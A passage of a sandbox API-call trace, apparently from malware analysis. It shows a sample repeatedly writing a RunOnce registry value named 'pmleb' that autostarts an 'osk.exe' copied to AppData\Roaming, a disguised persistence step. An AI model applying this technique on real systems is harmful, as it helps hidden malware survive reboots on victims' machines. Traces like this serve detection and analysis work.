(_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.665] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.666] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.666] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.666] RegCloseKey (hKey=0x280) returned 0x0 [0077.666] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.666] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.666] SetTimer (hWnd=0x20280, nIDEvent=0x200f, uElapse=0xa, lpTimerFunc=0x0) returned 0x200f [0077.666] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.678] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.678] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.678] KillTimer (hWnd=0x20280, uIDEvent=0x200f) returned 1 [0077.678] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.678] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.679] IUnknown:Release (This=0x787518) returned 0x1 [0077.679] GetTickCount () returned 0x1149a8b [0077.679] GetCurrentThreadId () returned 0x544 [0077.679] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.679] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.679] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.679] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.679] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.679] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.680] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x10 [0077.680] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.680] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x11 [0077.680] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.680] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x10 [0077.681] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.681] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.681] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.681] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.681] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.681] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.681] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 
[0077.681] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.681] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.681] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.681] RegCloseKey (hKey=0x280) returned 0x0 [0077.682] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.682] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.682] SetTimer (hWnd=0x20280, nIDEvent=0x2010, uElapse=0xa, lpTimerFunc=0x0) returned 0x2010 [0077.682] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.693] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.693] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.694] KillTimer (hWnd=0x20280, uIDEvent=0x2010) returned 1 [0077.694] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.694] CoGetObjectContext 
(in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.694] IUnknown:Release (This=0x787518) returned 0x1 [0077.694] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.694] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.694] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.695] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 
| out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.695] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.695] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x11 [0077.695] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.695] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x12 [0077.695] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, 
cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.696] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x11 [0077.696] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.696] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.696] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.696] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.696] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.696] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.696] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.696] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, 
lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.697] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.697] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.697] RegCloseKey (hKey=0x280) returned 0x0 [0077.697] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.697] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.697] SetTimer (hWnd=0x20280, nIDEvent=0x2011, uElapse=0xa, lpTimerFunc=0x0) returned 0x2011 [0077.697] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.709] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.709] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.709] KillTimer (hWnd=0x20280, uIDEvent=0x2011) returned 1 [0077.709] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.710] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: 
ppv=0x33f3b0*=0x787518) returned 0x0 [0077.710] IUnknown:Release (This=0x787518) returned 0x1 [0077.710] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.710] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.710] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.710] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.710] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.710] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.710] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.710] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.710] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.710] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x12 [0077.710] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.710] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x13 [0077.711] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, 
rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.711] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x12 [0077.711] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.711] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.711] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.711] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.711] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.711] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, 